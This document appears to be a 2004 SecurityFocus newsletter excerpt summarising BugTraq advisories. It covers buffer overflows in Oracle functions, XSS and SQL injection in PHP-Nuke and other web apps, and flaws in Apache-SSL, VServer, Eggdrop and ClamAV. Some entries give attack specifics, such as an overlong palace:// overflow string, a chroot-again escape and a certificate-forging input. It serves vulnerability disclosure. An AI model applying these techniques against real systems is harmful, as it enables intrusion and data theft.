SecurityFocus
1. Multiple Oracle Database Parameter/Statement Buffer Overflow...
BugTraq ID: 9587
Remote: Yes
Date Published: Feb 05 2004
Relevant URL:
http://www.securityfocus.com/bid/9587
Summary:
Oracle is a commercial database product, which is available for a number
of platforms including Microsoft Windows and Unix and Linux variants.
Oracle database has been reported prone to multiple buffer overflow
vulnerabilities when processing certain parameters and functions.
Specifically the TIME_ZONE parameter lacks sufficient boundary checks.
Therefore an excessive value assigned to TIME_ZONE may potentially overrun
the bounds of a buffer in stack-based memory. This may result in the
corruption of memory adjacent to the affected buffer, and ultimately may
provide for arbitrary code execution.
Additionally the NUMTOYMINTERVAL function has been reported prone to a
buffer overflow vulnerability. The issue presents itself due to a lack of
sufficient boundary checks performed on char_expr parameters passed as an
argument to the function. Again this issue may be exploited by passing
excessive data as the second argument to a NUMTOYMINTERVAL statement call.
The NUMTODSINTERVAL function has also been reported prone to a buffer
overflow vulnerability. The issue again presents itself due to a lack of
sufficient boundary checks performed on char_expr parameters passed as an
argument to the function. This issue may be exploited in a similar manner
to the NUMTOYMINTERVAL issue, by passing excessive data as the second
argument to a NUMTODSINTERVAL statement call.
Finally the FROM_TZ function has been reported prone to a buffer overflow
vulnerability. The issue will present itself when excessive data is passed
as the third parameter of a properly formatted FROM_TZ statement call.
Any one of these issues may be exploited to execute arbitrary code with
elevated privileges.
2. Mambo Open Source Itemid Parameter Cross-Site Scripting Vuln...
BugTraq ID: 9588
Remote: Yes
Date Published: Feb 05 2004
Relevant URL:
http://www.securityfocus.com/bid/9588
Summary:
Mambo Open Source is a web based content management system.
A vulnerability has been reported to exist in the server that may allow a
remote attacker to execute arbitrary HTML or script code in a user's
browser. The issue occurs due to insufficient sanitization of
user-supplied data via the 'Itemid' parameter of 'index.php' script. An
attacker may exploit this vulnerability by creating a specially crafted
URL that includes malicious HTML code as URI parameters for the server
'index.php' page. The malicious script code may be rendered in a user's
browser upon visiting the link. This attack would occur in the security
context of the site.
Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication credentials. Other attacks are also possible.
Mambo Open Source version 4.6 has been reported to be prone to this issue,
however, other versions may be affected has well.
4. Apache-SSL Client Certificate Forging Vulnerability
BugTraq ID: 9590
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9590
Summary:
Apache-SSL is an implementation of SSL (Secure Socket Layer) for the
Apache webserver.
Apache-SSL has been reported to be prone to a vulnerability. The issue
exists when Apache-SSL is configured with SSLVerifyClient set to 1 or 3
and SSLFakeBasicAuth active. It has been reported that a server possessing
the aforementioned configuration may provide a conduit that will allow a
remote attacker to forge a valid client certificate.
The attacker may exploit this issue by connecting to the affected service
and supplying a one-line DN of a valid user along with the password
"password". This will result in the issue of a valid client certificate.
This issue is reported to affect Apache-SSL 1.3.28+1.52 and all earlier
versions.
5. Joe Lumbroso Jack's Formmail.php Unauthorized Remote File Up...
BugTraq ID: 9591
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9591
Summary:
Jack's Formmail.php is a web based form to e-mail gateway. The
application is written in PHP, however, a Perl version is available as
well.
A vulnerability has been reported to exist in the software that may allow
a remote attacker to gain unauthorized access to a vulnerable server and
upload arbitrary files.
It has been reported that the software verifies the origin of a request
via HTTP referer. Due to improper validation performed in the
'check_referer()' function, an attacker can bypass the checks by supplying
an empty value for HTTP referer. This issue may then allow an attacker to
upload a file via the 'css' variable of 'file.php' script.
Successful exploitation of this issue may allow an attacker to save
malicious files to the system or potentially overwrite sensitive files.
Although unconfirmed, Formmail.php versions 5.0 and prior may be affected
by this issue.
6. Linux VServer Project CHRoot Breakout Vulnerability
BugTraq ID: 9596
Remote: No
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9596
Summary:
The Linux VServer Project is implemented with a linux kernel patch and a
group of tools that facilitate the partition of a single linux server into
multiple virtual servers. It is implemented with a combination of
"security contexts", chroot, segmented routing, extended quotas and other
standard tools.
It has been reported that VServer is prone to a breakout vulnerability
that would allow a malicious user to escape from the context of the
virtual server. This issue is due to the VServer application failing to
secure itself against a "chroot-again" style vulnerability. Successful
exploitation of this issue may allow an attacker to gain access to the
file system outside of the chrooted root directory.
This issue is leveraged when processes running in the context of the
virtual server utilize the chroot function. The process would change its
current directory to the root directory of the virtual server. It would
then create a temporary directory and chroot itself to the temporary
directory. The process, however still resides in the directory that is
outside of the one that it has chrooted itself to, and so, by making
multiple calls to chdir( ".." ) it is able to move to the true root
directory of the vulnerable system.
This problem makes it possible for a local user with superuser access in
the virtual server environment to execute commands outside of the VServer
context, and possibly gain unrestricted access to the system.
7. OpenJournal Authentication Bypassing Vulnerability
BugTraq ID: 9598
Remote: Yes
Date Published: Feb 06 2004
Relevant URL:
http://www.securityfocus.com/bid/9598
Summary:
OpenJournal is a web-based application implemented using PERL that
features automated file creation, automated index updating, editing of
files through a Web-based interface and automated archiving.
It has been reported that OpenJournal is prone to an authentication bypass
vulnerability. This issue is caused by the application failing to
properly sanitize URI specified parameters. Successful exploitation of
this issue may lead to remote attackers gaining unauthorized access to
online journal files associated with the application, adding new users to
the database as well as a number of other possibilities.
The issue is due to the URI parameter 'uid'. A malevolent user may gain
access to the OpenJournal control panel by assigning a specially crafted
value to the 'uid' parameter in a URI and submitting it to the
application.
8. Apache mod_php Global Variables Information Disclosure Weakn...
BugTraq ID: 9599
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9599
Summary:
Apache is a freely available, open source web server software package. It
is distributed and maintained by the Apache Group. Mod_PHP is an Apache
module which allows for PHP functionality in websites.
A weakness has been reported to exist in Apache mod_php module that may
allow remote attackers to disclose sensitive information via influencing
global variables.
The issue reportedly presents itself when the php.ini configuration file
has the parameter setting 'register_globals = on'. If a request is made
to a virtual host which has the setting 'php_admin_flag register_globals
off' and another request is made to a different virtual host which does
not have "php_admin_flag register_globals off", the original setting may
continue to exist. This issue could lead to other vulnerabilities such as
php file include, due to an attacker's ability to influence global
variables. An attacker may also be able to disclose sensitive information
in order to gain unauthorized access.
10. Brad Fears PHPCodeCabinet comments.php HTML Injection Vulner...
BugTraq ID: 9601
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9601
Summary:
PHPCodeCabinet is a web based application that allows software developers
to store code snippets from any language.
A vulnerability has been reported in the software that may allow a remote
attacker to execute HTML and script code in a user's browser. The problem
is reported to exist due to improper sanitizing of user-supplied data via
the 'sid' parameter of 'comments.php' script. It may be possible for an
attacker to include malicious HTML code in the vulnerable parameter. The
injected code could then be interpreted by the browser of a user visiting
the vulnerable site. This attack would occur in the security context of
the affected site.
Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication credentials. Other attacks are also possible.
PHPCodeCabinet versions 0.4 and prior have been reported to be vulnerable
to this issue.
11. The Palace Graphical Chat Client Remote Buffer Overflow Vuln...
BugTraq ID: 9602
Remote: Yes
Date Published: Feb 07 2004
Relevant URL:
http://www.securityfocus.com/bid/9602
Summary:
The Palace is a graphical chat client application.
A vulnerability has been reported to exist in the software that may allow
a remote attacker to execute arbitrary code on a vulnerable system in
order to gain unauthorized access. The condition is present due to
insufficient boundary checking.
It has been reported that The Palace chat client allows users to join a
chat server via specially crafted hyperlinks that automatically load the
application and connect to a server:
palace://example:9998/
The issue presents itself when a user attempts to follow a link that is
excessively long such as:
palace://('a'x118)('BBBB')('XXXX')
Immediate consequences of an attack may result in a denial of service
condition. An attacker may leverage the issue by exploiting an unbounded
memory copy operation to overwrite the saved return address/base pointer,
causing an affected procedure to return to an address of their choice.
Successful exploitation of this issue may allow an attacker to execute
arbitrary code in the context of the vulnerable user in order to gain
unauthorized access, however, this has not been confirmed at the moment.
The Palace chat client versions 3.5 and prior have been reported to be
prone to this issue.
13. Nadeo Game Engine Remote Denial of Service Vulnerability
BugTraq ID: 9604
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9604
Summary:
Nadeo Game Engine is a multiplayer game engine used in several Nadeo
titles.
A vulnerability has been reported to exist in the software that may allow
a remote attacker to cause a denial of service condition. It has been
reported that Trackmania uses TCP port 2350 for communication. A denial
of service condition may be caused by sending arbitrary data on this port.
Successful exploitation may allow an attacker to cause the software to
crash or hang affectively denying server to users.
14. PHP-Nuke 'News' Module Cross-Site Scripting Vulnerability
BugTraq ID: 9605
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9605
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
It has been reported that the PHP-Nuke 'News' module is prone to a
cross-site scripting vulnerability. The issue arises due to the module
failing to properly sanitize user-supplied information. The URI parameter
'title' is not properly sanitized of HTML tags. This could allow for
execution of hostile HTML and script code in the web client of a user who
visits a vulnerable web page. This would occur in the security context of
the site hosting the software.
Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
15. Eggdrop Share Module Arbitrary Share Bot Add Vulnerability
BugTraq ID: 9606
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9606
Summary:
Eggdrop is an Open Source multi-platform IRC (Internet Relay Chat) robot,
designed for IRC channel administration and maintenance. Eggdrop may be
configured as a share Bot, which means that two or more Bots share user
records.
Share.mod, a component of Eggdrop, has been reported prone to a
vulnerability that may result in the compromise of an entire Bot Network.
The issue presents itself due to a programming error in the
check_expired_tbufs() function that results in a failure to implement
intended program logic. This failure will result in every Bot that is
processed by check_expired_tbufs() receiving STAT_OFFERED status. The
attacker may further leverage this issue by employing the share_ufyes()
function, which only checks the STAT_OFFERED status of a prospective Bot,
before granting STAT_SHARE status to a malicious Bot.
If the aforementioned status is obtained, the malicious Bot will be
recognized as a Share Bot and will therefore have the ability to perform
administrative tasks, for example adduser, deluser, chattr, that will be
distributed through the entire Bot network.
An attacker may exploit this condition to gain control of an Eggdrop Bot
network.
18. JShop E-Commerce Suite xSearch Cross-Site Scripting Vulnerab...
BugTraq ID: 9609
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9609
Summary:
JShop E-Commerce Suite is a web based E-Commerce system implemented in
PHP. It is back-ended by a MySQL database.
A vulnerability has been reported to exist in JShop E-Commerce that may
allow a remote user to execute HTML or script code in a user's browser.
The issue is reported to exist due to improper sanitizing of user-supplied
data. It has been reported that HTML and script code may be parsed via the
'xSearch' URI parameter of the 'search.php' script. This vulnerability
makes it possible for an attacker to construct a malicious link containing
HTML or script code that may be rendered in a user's browser upon visiting
that link. This attack would occur in the security context of the site.
Successful exploitation of this attack may allow an attacker to steal
cookie-based authentication credentials. Other attacks are also possible.
19. ClamAV Daemon Malformed UUEncoded Message Denial Of Service ...
BugTraq ID: 9610
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9610
Summary:
ClamAV is a freely available, open source virus scanning utility. It is
available for the Unix and Linux platforms.
A problem in the handling of specially crafted UUEncoded messages has been
identified in ClamAV. Because of this, an attacker may prevent the
delivery of e-mail to users.
The problem is in the handling of malformed UUEncoded messages. When an
attacker sends an e-mail containing UUEncoded content and the line length
is a value that does not conform to UUEncoding conventions, the ClamAV
program terminates. Because of this, mail delivered to the system that
is routed through the scanner will not arrive at its destination,
resulting in a denial of service.
It should be noted that earlier versions of the software may also be
affected, though no information concerning the scope of the issue is
available.
21. PHP-Nuke 'Reviews' Module Cross-Site Scripting Vulnerability
BugTraq ID: 9613
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9613
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
It has been reported that the PHP-Nuke 'Reviews' module is prone to a
cross-site scripting vulnerability. The issue arises due to the module
failing to properly sanitize user-supplied information. The URI parameter
'title' is not properly sanitized of HTML tags. This could allow for
execution of hostile HTML and script code in the web client of a user who
visits a vulnerable web page. This would occur in the security context of
the site hosting the software.
Exploitation could allow for theft of cookie-based authentication
credentials. Other attacks are also possible.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
23. PHP-Nuke Public Message SQL Injection Vulnerability
BugTraq ID: 9615
Remote: Yes
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9615
Summary:
PHP-Nuke is a freeware content management system. Implemented in PHP, it
is available for a range of systems, including Unix, Linux, and Microsoft
Windows.
It has been reported that the 'public message' feature of PHP-Nuke is
vulnerable to an SQL injection vulnerability. The issue is due to a
failure to properly sanitize the '$p_msg' parameter in the
'public_message()' function of the '/mainfile.php' script.
As PHP-Nuke forces all variables to be global within the context of the
application, the '$p_msg' parameter may be specified in either POST, GET
or COOKIE data. Within the 'public_message()' function, the '$p_msg'
parameter is decoded into the '$c_mid' parameter, which is directly used
in the generation of the SQL query. An attacker could use an SQL Union
command passed via the '$p_msg' parameter to mine data from the database.
As a result of this issue an attacker could modify the logic and structure
of database queries. Other attacks may also be possible, such as gaining
access to sensitive information.
It has been reported that this issue affects versions 6.x - 7.x of the
software, however earlier versions may also be vulnerable.
24. Computer Associates eTrust InoculateIT For Linux Vulnerabili...
BugTraq ID: 9616
Remote: No
Date Published: Feb 09 2004
Relevant URL:
http://www.securityfocus.com/bid/9616
Summary:
Multiple vulnerabilities have been reported in eTrust InoculateIT for
Linux operating systems, including issues with temporary files that could
allow for symbolic link attacks and permissions problems that could permit
local attackers to modify sensitive information.
The following specific vulnerabilities were reported:
The insecure temporary file issues are reported to exist in the following
scripts:
ino/scripts/inoregupdate
scripts/uniftest
scripts/unimove
Due to the way in which these scripts create temporary files, it will be
possible to for a remote attacker to create a symbolic link in the
location that temporary files will be created. This will cause operations
that are intended to be performed on temporary files to be performed on
files pointed to by the malicious symbolic link. The most likely
consequences will be destruction of sensitive files, though in some
circumstances, if the attacker can control the data written in the attack,
it may be possible to gain elevated privileges.
There are insecure permissions on the eTrustAE.lnx/tmp/.caipcs/.sem
directory, allowing local attackers to modify sensitive configuration
files for the software.
The software installs several registry files that contain various software
settings. These registry files are included to simulate software settings
in the Windows Registry on Linux installations of the software. Some of
these files are reported to allow modification by unprivileged local
users, which could be exploited to lower security settings for the
software, such as removing scanned file types from the current user's
registry setting. Hard-coded search paths for executables may also be
embedded in user-modifiable registry files, allowing for execution of
arbitrary code with elevated privileges in some circumstances.
